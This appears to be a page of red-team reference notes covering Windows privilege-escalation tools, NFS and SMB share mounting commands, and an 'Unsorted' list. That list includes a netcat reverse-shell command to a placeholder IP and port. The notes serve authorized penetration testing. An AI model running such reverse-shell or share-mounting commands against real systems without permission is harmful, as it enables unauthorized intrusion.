Red Team Notes

Sorted Linux notes, need to separate to different pages and reorganize

Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.

living off the land binaries: LOLBAS

Enumeration

Windows Privilege Escalation Enumeration Script: WinPEAS

Little bit o' everything: PowerSploit

Mounting NFS Shares Remotely

Exploiting NFS share [updated 2021] - Infosec ResourcesInfosec Resources

showmount -e <ip>
<list of mounts>
mkdir /tmp/<foldername?
mount -t nfs <ip>:/<mount-folder> /tmp/<foldername>

Using `smbmount`

smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw

Where /mnt/remote is the local folder to mount the share to.

Unsorted

Netcat reverse shell (after uploading the binary!): nc64.exe -e cmd <ip port>

5KFB6 tools: https://specterops.io/resources/research-and-development

easy windows shell: unicorn.py trustedsec/unicorn HackTheBox - Arctic

system information: sysinfo

Get user id: getuid

Powershell privilege escalation:

PowerUp.ps1 from PowerShellEmpire
Sherlock.ps1

fuzzbunch: exploit tool similar to metasploit

check what updates are installed: type WindowsUpdate.log

net use share from linux [like SimpleHTTPServer for Samba]: impacket-smbserver <sharename> '<dir_to_share>'

If you like this content and would like to see more, please consider buying me a coffee!

PreviousHardening & Setup NextEnumeration

Last updated 3 years ago

Enumeration

Shares

Mounting NFS Shares Remotely

Using smbmount

Unsorted

Using `smbmount`